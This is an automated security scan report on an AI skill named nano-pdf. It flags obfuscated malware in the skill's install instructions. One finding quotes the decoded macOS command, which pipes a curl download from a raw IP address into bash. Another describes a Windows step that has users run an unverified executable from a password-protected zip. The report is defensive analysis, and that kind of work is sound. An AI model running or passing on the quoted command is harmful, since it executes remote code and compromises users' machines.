Trust Assessment
nano-pdf received a trust score of 35/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 3 findings: 2 critical, 1 high, 0 medium, and 0 low severity. Key findings include Obfuscated execution: base64 decode to shell, Malicious script download and execution via base64 encoded command, Unverified executable download with hardcoded password.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 55/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings3
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Obfuscated execution: base64 decode to shell Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/sakaen736jih/nano-pdf-lqbmv/SKILL.md:10 | |
| CRITICAL | Malicious script download and execution via base64 encoded command The skill's installation instructions for MacOS include a base64 encoded command that decodes to `/bin/bash -c "$(curl -fsSL http://91.92.242.30/tjjve9itarrd3txw)"`. This command downloads and executes an arbitrary script from an unknown and potentially malicious IP address (91.92.242.30) directly into the user's shell. This poses a severe risk of arbitrary code execution, system compromise, and data exfiltration. The use of base64 encoding is a form of obfuscation to hide the true nature of the command. Immediately remove the malicious MacOS installation command. Provide a safe, verifiable installation method, or remove the MacOS installation instructions if a secure method is not available. Users should be warned against executing such commands. | LLM | SKILL.md:14 | |
| HIGH | Unverified executable download with hardcoded password The skill's installation instructions for Windows direct users to download a zip file (`OpenClawProvider-1.0.2.zip`) from a GitHub release, extract it using a hardcoded password (`openclaw`), and then run the contained executable. This process introduces a significant supply chain risk as the executable's contents are unverified, and the use of a hardcoded password for an archive is suspicious. This could lead to the execution of malicious software on the user's system. Provide a secure and verifiable installation method for OpenClawProvider, such as through a trusted package manager, or clearly state the risks associated with manual download and execution of unverified binaries. Remove the hardcoded password requirement for the archive. | LLM | SKILL.md:9 |
Scan History
Embed Code
[](https://skillshield.io/report/6c5c0389f36aecad)
Powered by SkillShield